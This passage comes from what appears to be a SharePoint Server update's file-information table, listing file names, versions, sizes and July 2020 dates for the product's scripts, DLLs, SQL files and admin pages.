\nspui_listsearchbox_debug.js| sp.ui.listsearchbox.debug.js| | 39586| 7-Jul-20| 11:29 \nspui_listsearchbox.js| sp.ui.listsearchbox.js| | 20182| 7-Jul-20| 11:30 \nspui_listsearchboxbootstrap_debug.js| sp.ui.listsearchboxbootstrap.debug.js| | 7401| 7-Jul-20| 11:29 \nspui_listsearchboxbootstrap.js| sp.ui.listsearchboxbootstrap.js| | 3070| 7-Jul-20| 11:29 \nmicrofeeddebug.js| sp.ui.microfeed.debug.js| | 393708| 7-Jul-20| 11:29 \nmicrofeed.js| sp.ui.microfeed.js| | 230149| 7-Jul-20| 11:30 \nmysitecommondebug.js| sp.ui.mysitecommon.debug.js| | 131548| 7-Jul-20| 11:30 \nmysitecommon.js| sp.ui.mysitecommon.js| | 75540| 7-Jul-20| 11:29 \nmysitenavigationdebug.js| sp.ui.mysitenavigation.debug.js| | 2523| 7-Jul-20| 11:29 \nmysitenavigation.js| sp.ui.mysitenavigation.js| | 2523| 7-Jul-20| 11:29 \nmysiterecommendationsuidebug.js| sp.ui.mysiterecommendations.debug.js| | 14330| 7-Jul-20| 11:30 \nmysiterecommendationsui.js| sp.ui.mysiterecommendations.js| | 7268| 7-Jul-20| 11:29 \npeopledebug.js| sp.ui.people.debug.js| | 87048| 7-Jul-20| 11:29 \npeopledebug.js1| sp.ui.people.debug.js| | 87048| 7-Jul-20| 11:29 \npeople.js| sp.ui.people.js| | 59579| 7-Jul-20| 11:29 \npeople.js1| sp.ui.people.js| | 59579| 7-Jul-20| 11:29 \nspui_persond.js| sp.ui.person.debug.js| | 18230| 7-Jul-20| 11:30 \nspui_person.js| sp.ui.person.js| | 10326| 7-Jul-20| 11:29 \nspui_psd.js| sp.ui.promotedsites.debug.js| | 24862| 7-Jul-20| 11:30 \nspui_ps.js| sp.ui.promotedsites.js| | 15125| 7-Jul-20| 11:29 \nsp.ui.ratings.debug.js| sp.ui.ratings.debug.js| | 20220| 7-Jul-20| 11:29 \nsp.ui.ratings.js| sp.ui.ratings.js| | 11911| 7-Jul-20| 11:29 \nsp.ui.reputation.debug.js| sp.ui.reputation.debug.js| | 42482| 7-Jul-20| 11:30 \nsp.ui.reputation.js| sp.ui.reputation.js| | 25976| 7-Jul-20| 11:29 \nspssoc.js| sp.ui.socialribbon.js| | 20742| 7-Jul-20| 11:29 \nhomeapi.dll_gac| microsoft.sharepoint.homeapi.dll| 16.0.10363.12107| 352176| 7-Jul-20| 11:29 \nhomeapi.dll_isapi| microsoft.sharepoint.homeapi.dll| 16.0.10363.12107| 352176| 7-Jul-20| 11:29 \nportal.dll| microsoft.sharepoint.portal.dll| 16.0.10363.12107| 6994856| 7-Jul-20| 11:30 \nportal.dll_001| microsoft.sharepoint.portal.dll| 16.0.10363.12107| 6994856| 7-Jul-20| 11:30 \nprofileext.sql| profileext.sql| | 1388377| 5-Jul-20| 09:42 \nprofilesrp.sql| profilesrp.sql| | 1553927| 5-Jul-20| 09:42 \nprofilesrp_c.sql| profilesrp_c.sql| | 150583| 5-Jul-20| 09:42 \nprofilesrp_n.sql| profilesrp_n.sql| | 1004057| 5-Jul-20| 09:42 \nantixsslibrary.dll| antixsslibrary.dll| 3.0.3259.31320| 26256| | \nupdate_antixsslibrary.dll| antixsslibrary.dll| 3.0.3259.31320| 26256| 5-Jul-20| 09:22 \nstsapa.dll| microsoft.sharepoint.applicationpages.administration.dll| 16.0.10363.12107| 688552| 7-Jul-20| 11:30 \nwssadmop.dll_0001| microsoft.sharepoint.administrationoperation.dll| 16.0.10363.12107| 1173472| 7-Jul-20| 11:30 \nanglesharp.dll| anglesharp.dll| 0.9.7| 1203712| | \nupdate_anglesharp.dll| anglesharp.dll| 0.9.7| 1203712| 5-Jul-20| 09:35 \ntimezone.xml| timezone.xml| | 89327| 5-Jul-20| 09:47 \nsiteupgrade.xml| siteupgradelinks.xml| | 534| 5-Jul-20| 09:33 \nsiteupgrade.xml_14| siteupgradelinks.xml| | 534| 5-Jul-20| 09:33 \nmicrosoft.sharepoint.health.dll| microsoft.sharepoint.health.dll| 16.0.10363.12107| 136160| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.identitymodel.dll| microsoft.sharepoint.identitymodel.dll| 16.0.10363.12107| 655272| 7-Jul-20| 11:30 \nmicrosoft.owin.3.0.1.dll| microsoft.owin.dll| 3.0.40213.64| 101032| | \nupdate_microsoft.owin.3.0.1.dll| microsoft.owin.dll| 3.0.40213.64| 101032| 5-Jul-20| 09:34 \nmicrosoft.owin.host.systemweb.3.0.1.dll| microsoft.owin.host.systemweb.dll| 3.0.40213.64| 133288| | \nupdate_microsoft.owin.host.systemweb.3.0.1.dll| microsoft.owin.host.systemweb.dll| 3.0.40213.64| 133288| 5-Jul-20| 09:34 \nmicrosoft.sharepoint.client.dll.x64| microsoft.sharepoint.client.dll| 16.0.10363.12107| 853920| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.dll_0001.x64| microsoft.sharepoint.client.dll| 16.0.10363.12107| 853920| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.phone.dll| microsoft.sharepoint.client.phone.dll| 16.0.10363.12107| 799152| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.portable.dll.x64| microsoft.sharepoint.client.portable.dll| 16.0.10363.12107| 815032| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.portable.dll_gac.x64| microsoft.sharepoint.client.portable.dll| 16.0.10363.12107| 815032| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.serverruntime.dll| microsoft.sharepoint.client.serverruntime.dll| 16.0.10363.12107| 740824| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.serverruntime.dll_0001| microsoft.sharepoint.client.serverruntime.dll| 16.0.10363.12107| 740824| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.client.silverlight.dll.x64| microsoft.sharepoint.client.silverlight.dll| 16.0.10363.12107| 798136| 7-Jul-20| 11:30 \ncontextinfo.dll_0001| microsoft.sharepoint.context.dll| 16.0.10363.12107| 48544| 7-Jul-20| 11:30 \nsplinq.dll| microsoft.sharepoint.linq.dll| 16.0.10363.12107| 388512| 7-Jul-20| 11:30 \nsplinqvs.dll| microsoft.sharepoint.linq.dll| 16.0.10363.12107| 388512| 7-Jul-20| 11:30 \nrenderlist.dll_0001| microsoft.sharepoint.renderlist.dll| 16.0.10363.12107| 22944| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.serverstub.dll| microsoft.sharepoint.serverstub.dll| 16.0.10363.12107| 2888672| 7-Jul-20| 11:30 \nnewtonsoft.json.6.0.8.dll| newtonsoft.json.dll| 6.0.8.18111| 513536| | \nupdate_newtonsoft.json.6.0.8.dll| newtonsoft.json.dll| 6.0.8.18111| 513536| 5-Jul-20| 09:22 \noffprsx.dll| offparser.dll| 16.0.10363.12107| 2138552| 7-Jul-20| 11:30 \nowin.1.0.dll| owin.dll| 1.0| 4608| | \nupdate_owin.1.0.dll| owin.dll| 1.0| 4608| 5-Jul-20| 09:35 \nstslib.dll_0001| microsoft.sharepoint.library.dll| 16.0.10363.12107| 230328| 7-Jul-20| 11:30 \nowssvr.dll_0001| owssvr.dll| 16.0.10363.12107| 6900656| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.powershell.dll_0001| microsoft.sharepoint.powershell.dll| 16.0.10363.12107| 1065912| 7-Jul-20| 11:30 \nmicrosoft.sharepoint.powershell.intl.dll| microsoft.sharepoint.powershell.intl.dll| 16.0.10363.12107| 97200| 7-Jul-20| 11:30 \npsconfig.exe| psconfig.exe| 16.0.10363.12107| 538568| 7-Jul-20| 11:28 \npsconfigui.exe| psconfigui.exe| 16.0.10363.12107| 809936| 7-Jul-20| 11:28 \ncore_0.rsx| core.resx| | 526140| 7-Jul-20| 11:26 \nstsom.dll| microsoft.sharepoint.dll| 16.0.10363.12107| 38551960| 7-Jul-20| 11:25 \nstsom.dll_0001| microsoft.sharepoint.dll| 16.0.10363.12107| 38551960| 7-Jul-20| 11:25 \nstsomdr.dll| microsoft.sharepoint.intl.dll| 16.0.10363.12107| 1409464| 7-Jul-20| 11:25 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 16.0.10363.12107| 2445776| 7-Jul-20| 11:30 \nstssoap.dll| stssoap.dll| 16.0.10363.12107| 776616| 7-Jul-20| 11:26 \nsubsetproxy.dll_0001| microsoft.sharepoint.subsetproxy.dll| 16.0.10363.12107| 1140704| 7-Jul-20| 11:26 \nsubsetshim.dll_0001| microsoft.sharepoint.dll| 16.900.rup.rpr| 2449312| 7-Jul-20| 11:29 \nsystem.net.http.formatting.5.2.3.dll| system.net.http.formatting.dll| 5.2.30128.0| 185544| | \nupdate_system.net.http.formatting.5.2.3.dll| system.net.http.formatting.dll| 5.2.30128.0| 185544| 5-Jul-20| 09:23 \nsystem.web.http.5.2.3.dll| system.web.http.dll| 5.2.30128.0| 471240| | \nupdate_system.web.http.5.2.3.dll| system.web.http.dll| 5.2.30128.0| 471240| 5-Jul-20| 09:35 \napplications.asx_0014| applications.aspx| | 3998| 5-Jul-20| 09:37 \napps.asx_0014| apps.aspx| | 3974| 5-Jul-20| 09:38 \nbackups.asx_0014| backups.aspx| | 3983| 5-Jul-20| 09:37 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 4022| 5-Jul-20| 09:38 \ndefault.asx_0014| default.aspx| | 5440| 5-Jul-20| 09:37 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 4041| 5-Jul-20| 09:37 \nmonitoring.asx_0014| monitoring.aspx| | 3992| 5-Jul-20| 09:38 \no365config.asx_0015| office365configuration.aspx| | 5180| 5-Jul-20| 09:37 \nsecurity.asx_0014| security.aspx| | 3986| 5-Jul-20| 09:37 \nsysset.asx_0014| systemsettings.aspx| | 4004| 5-Jul-20| 09:37 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 4019| 5-Jul-20| 09:38 \ndip.js| dip.js| | 50487| 5-Jul-20| 09:33 \ndip.js_14| dip.js| | 50487| 5-Jul-20| 09:33 \nfldtypes.xsl| fldtypes.xsl| | 134876| 5-Jul-20| 09:41 \ninternal.xsl| internal.xsl| | 11270| 5-Jul-20| 09:40 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 20696| 7-Jul-20| 11:26 \naccreqctl.js| accessrequestscontrol.js| | 11684| 7-Jul-20| 11:26 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 50013| 7-Jul-20| 11:26 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 22933| 7-Jul-20| 11:25 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9638| 7-Jul-20| 11:26 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3695| 7-Jul-20| 11:26 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 23162| 7-Jul-20| 11:25 \nappdeveloperdash.js| appdeveloperdash.js| | 11552| 7-Jul-20| 11:25 \napprequestmanagefieldtemplate.debug.js| apprequestmanagefieldtemplate.debug.js| | 2771| 7-Jul-20| 11:26 \napprequestmanagefieldtemplate.js| apprequestmanagefieldtemplate.js| | 1476| 7-Jul-20| 11:26 \nautofill.debug.js| autofill.debug.js| | 20542| 7-Jul-20| 11:26 \nautofill.js| autofill.js| | 11562| 7-Jul-20| 11:26 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 21187| 7-Jul-20| 11:25 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8989| 7-Jul-20| 11:26 \nbform.debug.js| bform.debug.js| | 460795| 7-Jul-20| 11:26 \nbform.js| bform.js| | 259449| 7-Jul-20| 11:26 \nblank.debug.js| blank.debug.js| | 755| 7-Jul-20| 11:26 \nblank.js| blank.js| | 456| 7-Jul-20| 11:25 \ncallout.debug.js| callout.debug.js| | 92058| 7-Jul-20| 11:25 \ncallout.js| callout.js| | 29842| 7-Jul-20| 11:26 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 6382| 7-Jul-20| 11:25 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2743| 7-Jul-20| 11:26 \nclientforms.debug.js| clientforms.debug.js| | 156030| 7-Jul-20| 11:26 \nclientforms.js| clientforms.js| | 79307| 7-Jul-20| 11:26 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 83429| 7-Jul-20| 11:26 \nclientpeoplepicker.js| clientpeoplepicker.js| | 44310| 7-Jul-20| 11:25 \nclientrenderer.debug.js| clientrenderer.debug.js| | 30681| 7-Jul-20| 11:26 \nclientrenderer.js| clientrenderer.js| | 12960| 7-Jul-20| 11:26 \nclienttemplates.debug.js| clienttemplates.debug.js| | 398011| 7-Jul-20| 11:26 \nclienttemplates.js| clienttemplates.js| | 203315| 7-Jul-20| 11:25 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 6758| 7-Jul-20| 11:26 \ncomval.js| commonvalidation.js| | 4224| 7-Jul-20| 11:26 \ncore.debug.js| core.debug.js| | 955755| 7-Jul-20| 11:26 \ncore.js_0001| core.js| | 507035| 7-Jul-20| 11:26 \ncreatesharedfolderdialog.debug.js| createsharedfolderdialog.debug.js| | 43148| 7-Jul-20| 11:25 \ncreatesharedfolderdialog.js| createsharedfolderdialog.js| | 18922| 7-Jul-20| 11:26 \ndatepicker.debug.js| datepicker.debug.js| | 160480| 7-Jul-20| 11:26 \ndatepick.js| datepicker.js| | 71517| 7-Jul-20| 11:25 \ndesigngallery.debug.js| designgallery.debug.js| | 47390| 7-Jul-20| 11:25 \ndesigngallery.js| designgallery.js| | 29175| 7-Jul-20| 11:26 \ndevdash.debug.js| devdash.debug.js| | 89841| 7-Jul-20| 11:26 \ndevdash.js| devdash.js| | 38404| 7-Jul-20| 11:25 \ndragdrop.debug.js| dragdrop.debug.js| | 237831| 7-Jul-20| 11:26 \ndragdrop.js| dragdrop.js| | 122518| 7-Jul-20| 11:26 \nentityeditor.debug.js| entityeditor.debug.js| | 73995| 7-Jul-20| 11:26 \nentityeditor.js| entityeditor.js| | 38999| 7-Jul-20| 11:26 \nfilepreview.debug.js| filepreview.debug.js| | 25986| 7-Jul-20| 11:26 \nfilepreview.js| filepreview.js| | 14046| 7-Jul-20| 11:26 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3924| 7-Jul-20| 11:26 \nfoldhyperlink.js| foldhyperlink.js| | 1863| 7-Jul-20| 11:26 \nform.debug.js| form.debug.js| | 241306| 7-Jul-20| 11:26 \nform.js| form.js| | 129252| 7-Jul-20| 11:25 \nganttscript.debug.js| ganttscript.debug.js| | 9384| 7-Jul-20| 11:25 \nganttscr.js| ganttscript.js| | 5100| 7-Jul-20| 11:26 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 41051| 7-Jul-20| 11:26 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 15436| 7-Jul-20| 11:26 \ngroupboard.debug.js| groupboard.debug.js| | 16339| 7-Jul-20| 11:26 \ngroupboard.js| groupboard.js| | 9550| 7-Jul-20| 11:26 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 21014| 7-Jul-20| 11:26 \ngip.js| groupeditempicker.js| | 12057| 7-Jul-20| 11:26 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 60796| 7-Jul-20| 11:26 \nhierarchytaskslist.js| hierarchytaskslist.js| | 20088| 7-Jul-20| 11:25 \nimglib.debug.js| imglib.debug.js| | 91322| 7-Jul-20| 11:26 \nimglib.js| imglib.js| | 53907| 7-Jul-20| 11:25 \ninit.debug.js| init.debug.js| | 626758| 7-Jul-20| 11:26 \ninit.js_0001| init.js| | 303156| 7-Jul-20| 11:26 \ninplview.debug.js| inplview.debug.js| | 156138| 7-Jul-20| 11:26 \ninplview.js| inplview.js| | 79678| 7-Jul-20| 11:26 \njsgrid.debug.js| jsgrid.debug.js| | 1185748| 7-Jul-20| 11:26 \njsgrid.gantt.debug.js| jsgrid.gantt.debug.js| | 110109| 7-Jul-20| 11:25 \njsgrid.gantt.js| jsgrid.gantt.js| | 42306| 7-Jul-20| 11:26 \njsgrid.js| jsgrid.js| | 444712| 7-Jul-20| 11:26 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11518| 7-Jul-20| 11:26 \nlistview.debug.js| listview.debug.js| | 932106| 7-Jul-20| 11:26 \nlistview.js| listview.js| | 400608| 7-Jul-20| 11:26 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 38394| 7-Jul-20| 11:25 \nmapviewtemplate.js| mapviewtemplate.js| | 15544| 7-Jul-20| 11:26 \nmenu.debug.js| menu.debug.js| | 103516| 7-Jul-20| 11:26 \nmenu.js_0001| menu.js| | 52561| 7-Jul-20| 11:26 \nsuitenavstandalone.js| suitenavstandalone.js| | 244295| 5-Jul-20| 09:47 \nmountpt.debug.js| mountpoint.debug.js| | 13632| 7-Jul-20| 11:25 \nmountpt.js| mountpoint.js| | 6213| 7-Jul-20| 11:26 \nmquery.debug.js| mquery.debug.js| | 60340| 7-Jul-20| 11:26 \nmquery.js| mquery.js| | 22616| 7-Jul-20| 11:26 \nms.rte.debug.js| ms.rte.debug.js| | 714303| 7-Jul-20| 11:26 \nms.rte.js| ms.rte.js| | 401121| 7-Jul-20| 11:25 \noffline.debug.js| offline.debug.js| | 22154| 7-Jul-20| 11:26 \noffline.js| offline.js| | 11385| 7-Jul-20| 11:26 \nows.debug.js| ows.debug.js| | 714306| 7-Jul-20| 11:25 \nows.js| ows.js| | 376995| 7-Jul-20| 11:25 \nowsbrows.debug.js| owsbrows.debug.js| | 24954| 7-Jul-20| 11:26 \nowsbrows.js| owsbrows.js| | 13302| 7-Jul-20| 11:26 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 84678| 7-Jul-20| 11:26 \npivotcontrol.debug.js| pivotcontrol.debug.js| | 18165| 5-Jul-20| 09:48 \npivotcontrol.js| pivotcontrol.js| | 8592| 5-Jul-20| 09:47 \nquicklaunch.debug.js| quicklaunch.debug.js| | 135522| 7-Jul-20| 11:26 \nquicklaunch.js| quicklaunch.js| | 74050| 7-Jul-20| 11:26 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3557| 7-Jul-20| 11:25 \nroamingapps.debug.js| roamingapps.debug.js| | 55031| 7-Jul-20| 11:26 \nroamingapps.js| roamingapps.js| | 21855| 7-Jul-20| 11:26 \nsharing.debug.js| sharing.debug.js| | 322361| 7-Jul-20| 11:26 \nsharing.js| sharing.js| | 135350| 7-Jul-20| 11:26 \nsharingmodern.debug.js| sharingmodern.debug.js| | 18196| 7-Jul-20| 11:26 \nsharingmodern.js| sharingmodern.js| | 5807| 7-Jul-20| 11:26 \nsinglesignon.debug.js| singlesignon.debug.js| | 17059| 7-Jul-20| 11:25 \nsinglesignon.js| singlesignon.js| | 6062| 7-Jul-20| 11:26 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1693| 7-Jul-20| 11:26 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1693| 7-Jul-20| 11:26 \nsiteupgrade.js| siteupgrade.js| | 1121| 7-Jul-20| 11:26 \nsiteupgrade.js_14| siteupgrade.js| | 1121| 7-Jul-20| 11:26 \nsp.accessibility.debug.js| sp.accessibility.debug.js| | 34811| 7-Jul-20| 11:25 \nsp.accessibility.js| sp.accessibility.js| | 21843| 7-Jul-20| 11:26 \nsp.core.debug.js| sp.core.debug.js| | 166073| 7-Jul-20| 11:26 \nsp.core.js| sp.core.js| | 87930| 7-Jul-20| 11:26 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 115552| 7-Jul-20| 11:26 \nsp.datetimeutil.js| sp.datetimeutil.js| | 66620| 7-Jul-20| 11:25 \nsp.debug.js| sp.debug.js| | 1706076| 7-Jul-20| 11:26 \nsp.exp.debug.js| sp.exp.debug.js| | 41182| 7-Jul-20| 11:25 \nsp.exp.js| sp.exp.js| | 24500| 7-Jul-20| 11:26 \nsp.init.debug.js| sp.init.debug.js| | 57831| 7-Jul-20| 11:26 \nsp.init.js| sp.init.js| | 32954| 7-Jul-20| 11:26 \nsp.js| sp.js| | 1044727| 7-Jul-20| 11:26 \nspmap.debug.js| sp.map.debug.js| | 15759| 7-Jul-20| 11:26 \nspmap.js| sp.map.js| | 8533| 7-Jul-20| 11:25 \nsppageinstr.debug.js| sp.pageinstrumentation.debug.js| | 1925| 7-Jul-20| 11:26 \nsppageinstr.js| sp.pageinstrumentation.js| | 1397| 7-Jul-20| 11:25 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 100405| 7-Jul-20| 11:26 \nsp.requestexecutor.js| sp.requestexecutor.js| | 63698| 7-Jul-20| 11:26 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 361474| 7-Jul-20| 11:26 \nsp.ribbon.js| sp.ribbon.js| | 222919| 7-Jul-20| 11:25 \nsp.runtime.debug.js| sp.runtime.debug.js| | 197022| 7-Jul-20| 11:26 \nsp.runtime.js| sp.runtime.js| | 115686| 7-Jul-20| 11:26 \nsp.simpleloggermobile.debug.js| sp.simpleloggermobile.debug.js| | 40931| 7-Jul-20| 11:26 \nsp.simpleloggermobile.js| sp.simpleloggermobile.js| | 20444| 7-Jul-20| 11:26 \nsp.storefront.debug.js| sp.storefront.debug.js| | 440500| 7-Jul-20| 11:25 \nsp.storefront.js| sp.storefront.js| | 296738| 7-Jul-20| 11:26 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18904| 7-Jul-20| 11:26 \nsp.ui.admin.js| sp.ui.admin.js| | 11613| 7-Jul-20| 11:25 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 45304| 7-Jul-20| 11:26 \nsp.ui.allapps.js| sp.ui.allapps.js| | 27974| 7-Jul-20| 11:26 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 278413| 7-Jul-20| 11:26 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 143450| 7-Jul-20| 11:25 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 11283| 7-Jul-20| 11:26 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 7684| 7-Jul-20| 11:26 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16634| 7-Jul-20| 11:26 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11652| 7-Jul-20| 11:26 \nspblogd.js| sp.ui.blogs.debug.js| | 51882| 7-Jul-20| 11:26 \nspblog.js| sp.ui.blogs.js| | 31204| 7-Jul-20| 11:25 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 100153| 7-Jul-20| 11:25 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52058| 7-Jul-20| 11:26 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 58556| 7-Jul-20| 11:26 \nsp.ui.controls.js| sp.ui.controls.js| | 39729| 7-Jul-20| 11:26 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 75579| 7-Jul-20| 11:26 \nsp.ui.dialog.js| sp.ui.dialog.js| | 44114| 7-Jul-20| 11:26 \nspdiscd.js| sp.ui.discussions.debug.js| | 136823| 7-Jul-20| 11:25 \nspdisc.js| sp.ui.discussions.js| | 81825| 7-Jul-20| 11:26 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 28399| 7-Jul-20| 11:26 \nspimgc.js| sp.ui.imagecrop.js| | 28399| 7-Jul-20| 11:26 \nspui_rid.js| sp.ui.relateditems.debug.js| | 29224| 7-Jul-20| 11:25 \nspui_ri.js| sp.ui.relateditems.js| | 18378| 7-Jul-20| 11:26 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 355959| 7-Jul-20| 11:26 \nsp.ui.rte.js| sp.ui.rte.js| | 217946| 7-Jul-20| 11:25 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 100921| 7-Jul-20| 11:26 \nsp.ui.tileview.js| sp.ui.tileview.js| | 61802| 7-Jul-20| 11:26 \nspui_tld.js| sp.ui.timeline.debug.js| | 488762| 7-Jul-20| 11:26 \nspui_tl.js| sp.ui.timeline.js| | 265918| 7-Jul-20| 11:26 \nspgantt.debug.js| spgantt.debug.js| | 192623| 7-Jul-20| 11:26 \nspgantt.js| spgantt.js| | 69727| 7-Jul-20| 11:26 \nspgridview.debug.js| spgridview.debug.js| | 7876| 7-Jul-20| 11:26 \nspgridvw.js| spgridview.js| | 4903| 7-Jul-20| 11:25 \nstart.debug.js| start.debug.js| | 185210| 7-Jul-20| 11:26 \nstart.js| start.js| | 101324| 7-Jul-20| 11:25 \nsuitelinks.debug.js| suitelinks.debug.js| | 32319| 7-Jul-20| 11:25 \nsuitelnk.js| suitelinks.js| | 13508| 7-Jul-20| 11:26 \ntimecard.debug.js| timecard.debug.js| | 37455| 7-Jul-20| 11:26 \ntimecard.js| timecard.js| | 21192| 7-Jul-20| 11:26 \ntouchapp.js| touchapp.js| | 498041| 5-Jul-20| 09:48 \nwpadder.debug.js| wpadder.debug.js| | 52865| 7-Jul-20| 11:26 \nwpadder.js| wpadder.js| | 33270| 7-Jul-20| 11:25 \nwpcm.debug.js| wpcm.debug.js| | 7521| 7-Jul-20| 11:26 \nwpcm.js| wpcm.js| | 3849| 7-Jul-20| 11:25 \nmain.xsl| main.xsl| | 6078| 5-Jul-20| 09:40 \nsigstore.dll| sigstore.dll| | 19888| | \nupdate_sigstore.dll| sigstore.dll| | 19888| 5-Jul-20| 09:38 \nstore.sql| store.sql| | 8074807| 5-Jul-20| 09:42 \nstore.xml| store.xml| | 8917277| 7-Jul-20| 11:29 \nstoreazure.xml| store_azure.xml| | 8917277| 7-Jul-20| 11:29 \nusagedb.sql| usagedb.sql| | 88742| 5-Jul-20| 09:42 \nusgdbup.sql| usgdbup.sql| | 88551| 5-Jul-20| 09:42 \nappassoc.asx| applicationassociations.aspx| | 5504| 5-Jul-20| 09:34 \nauthen.asx| authentication.aspx| | 13965| 5-Jul-20| 09:32 \nblkftyp.asx| blockedfiletype.aspx| | 4282| 5-Jul-20| 09:34 \ndftcntdb.asx| defaultcontentdb.aspx| | 6243| 5-Jul-20| 09:33 \nhealrepo.asx| healthreport.aspx| | 6499| 5-Jul-20| 09:32 \nincemail.asx| incomingemail.aspx| | 22663| 5-Jul-20| 09:33 \nirmadmin.asx| irmadmin.aspx| | 8804| 5-Jul-20| 09:32 \nlogusage.asx| logusage.aspx| | 14555| 5-Jul-20| 09:34 \nmetrics.asx| metrics.aspx| | 15403| 5-Jul-20| 09:32 \nofadmin.asx| officialfileadmin.aspx| | 13839| 5-Jul-20| 09:33 \nprivacy.asx| privacy.aspx| | 10182| 5-Jul-20| 09:32 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5643| 5-Jul-20| 09:33 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 5027| 5-Jul-20| 09:32 \nsiteex.asx| siteandlistexport.aspx| | 12538| 5-Jul-20| 09:33 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10389| 5-Jul-20| 09:32 \nsitecbac.asx| sitecollectionbackup.aspx| | 10764| 5-Jul-20| 09:32 \nsitequot.asx| sitequota.aspx| | 24455| 5-Jul-20| 09:32 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7731| 5-Jul-20| 09:32 \nunatcdb.asx| unattacheddbselect.aspx| | 6322| 5-Jul-20| 09:33 \nuser_solution.asx| usersolutions.aspx| | 9571| 5-Jul-20| 09:33 \nlightbox.asx| lightbox.aspx| | 10265| 5-Jul-20| 09:48 \nshare.asx| share.aspx| | 47815| 5-Jul-20| 09:48 \nversions.asx| versions.aspx| | 37378| 5-Jul-20| 09:48 \nofadmin.aspx_tenantadmin| ta_officialfileadmin.aspx| | 11593| 5-Jul-20| 09:50 \nowstimer.exe_0001| owstimer.exe| 16.0.10363.12107| 80800| 7-Jul-20| 11:30 \nmicrosoft.extensions.dependencyinjection.abstractions.1.0.0.dll| microsoft.extensions.dependencyinjection.abstractions.dll| 1.0.0.20622| 35736| | \nupdate_microsoft.extensions.dependencyinjection.abstractions.1.0.0.dll| microsoft.extensions.dependencyinjection.abstractions.dll| 1.0.0.20622| 35736| 5-Jul-20| 09:49 \nmicrosoft.extensions.dependencyinjection.1.0.0.dll| microsoft.extensions.dependencyinjection.dll| 1.0.0.20622| 37272| | \nupdate_microsoft.extensions.dependencyinjection.1.0.0.dll| microsoft.extensions.dependencyinjection.dll| 1.0.0.20622| 37272| 5-Jul-20| 09:49 \nmicrosoft.odata.core.7.0.0.dll| microsoft.odata.core.dll| 7.0.0.0| 1395616| | \nupdate_microsoft.odata.core.7.0.0.dll| microsoft.odata.core.dll| 7.0.0.0| 1395616| 5-Jul-20| 09:49 \nmicrosoft.odata.edm.7.0.0.dll| microsoft.odata.edm.dll| 7.0.0.0| 780192| | \nupdate_microsoft.odata.edm.7.0.0.dll| microsoft.odata.edm.dll| 7.0.0.0| 780192| 5-Jul-20| 09:49 \nmicrosoft.spatial.7.0.0.dll| microsoft.spatial.dll| 7.0.0.0| 135584| | \nupdate_microsoft.spatial.7.0.0.dll| microsoft.spatial.dll| 7.0.0.0| 135584| 5-Jul-20| 09:49 \nmicrosoft.vroom.sharepoint.dll| microsoft.vroom.sharepoint.dll| 16.0.10363.12107| 623544| 7-Jul-20| 11:27 \nsystem.collections.immutable.1.2.0.dll| system.collections.immutable.dll| 1.0.24212.01| 174000| | \nupdate_system.collections.immutable.1.2.0.dll| system.collections.immutable.1.2.0.dll| 1.0.24212.01| 174000| 5-Jul-20| 09:49 \nsystem.web.http.owin.5.2.3.dll| system.web.http.owin.dll| 